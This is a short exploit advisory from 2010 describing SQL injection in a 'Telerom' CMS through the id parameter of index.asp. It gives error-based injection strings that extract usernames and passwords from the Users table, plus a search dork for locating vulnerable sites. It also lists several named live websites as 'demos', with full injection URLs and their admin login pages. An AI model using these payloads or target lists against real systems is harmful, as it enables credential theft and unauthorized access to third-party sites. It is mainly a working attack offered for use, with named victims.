Text : #########
[+] Exploit Title: Telerom Cms Reamot SQL Injection Vulnerability
[+] Date: 2010-02-08
[+] Author: Ashiyane Digital Security Members (Cair3x)
[+] Software Link: http://www.telerom.co.il/
[+] Version: -
[+] Tested on: -
[+] Dork: Site powered by [ Telerom ] ,Israel - 2005
#####################################################################
Vulnerable script: index.asp?id=[SQL Injection]
[ Vulnerability ]
Http://Site.il/index.asp?id=[SQL Injection]
[ Exploit ]
Username : and 1=convert(int,(select top 1
convert(varchar,isnull(convert(varchar,UserName),'NULL')) from
Users))--sp_password
Password : and 1=convert(int,(select top 1
convert(varchar,isnull(convert(varchar,Pwd),'NULL')) from
Users))--sp_password
[ Login Page ]
Http://Site.il/admin/login/login.asp
[ Demo ]
http://www.sgocr.org.il
http://www.scool.co.il/yammrace/index.asp?id=2497
[ Exploit ] -
Username : http://www.sgocr.org.il/index.asp?id=1265 and
1=convert(int,(select top 1
convert(varchar,isnull(convert(varchar,Username),'NULL')) from
Users))--sp_password
Password : http://www.sgocr.org.il/index.asp?id=1265 and
1=convert(int,(select top 1
convert(varchar,isnull(convert(varchar,Pwd),'NULL')) from
Users))--sp_password
[ Login Page Demo ]
http://www.sgocr.org.il/admin/login/login.asp
#####################################################################
BY : Cair3x [Cair3x.Support@Gmail.com]
Web Site : Ashiyane.org
Forum : Http://Ashiyane.org/forums/
[+] Greetz to All Ashiyane Digital Security Member (And Virangar Good
Frinds)
####